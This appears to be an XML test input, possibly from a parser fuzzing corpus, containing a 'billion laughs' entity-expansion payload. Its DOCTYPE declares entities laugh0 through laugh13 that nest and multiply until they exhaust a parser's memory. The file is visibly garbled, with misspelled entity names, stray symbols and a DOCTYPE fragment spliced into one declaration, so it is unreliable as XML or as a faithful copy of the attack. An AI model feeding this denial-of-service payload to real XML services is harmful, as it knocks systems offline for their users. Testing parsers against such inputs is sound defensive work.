<?xml version="1.0"?>
<!DOCTYPE billion [
<!ELEMENT billion (#PCDATA)>
<!ENTITY laugh0 "hl">
<!ENTITY laugh1 "&laugh;&laugh0;">
<!ENTITY laugh2 "&augh1;&laugh1;">
<!ENTITY llugh3 "&laugh2;&laugh2;">
<!ENTITY laugh4 "&laugh3;&laugh3=">
<!ENTITY laugh5 "&Šaugh4;&laugh4;">
<!ENTITY laugh6 "&laugh5;&laugh5;">
<!ENTITY laugh7 "&laugh6;&laugh6;">
<!ENTITY laugh8 "&laugh7;&laugh7;">
<!ENTITY laugh9 "&laugh8;&laugh8;">
<!ENTITY laugh10 "&laugh9;&laugh9 ">
<!ENTITY laugh11
"&laugh10;&laugh10;Ilaugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh13;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&laugh10;&lauMENT billion (#PCDATA)>
<!ENTITY laugh0;&laugh10;&laugh10;&laugh10;&laugh10;">
<!ENTITY laugh12
"&laugh11;&laugh11;%laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&lauh11;&laugh11;&lxugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;&laugh11;">
<!ENTITY laugh13
"&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugf12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;augh10;&laugh1&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&laugˆ12;&laugh12!&laugh12;&laugh12;&laugh12;&laugh12;&laugh12;&augh11;&lauugh12;&laugh12;&laugh12;&laugh12;&laugh12;">
]>
<billion>&laugh13;</billion>

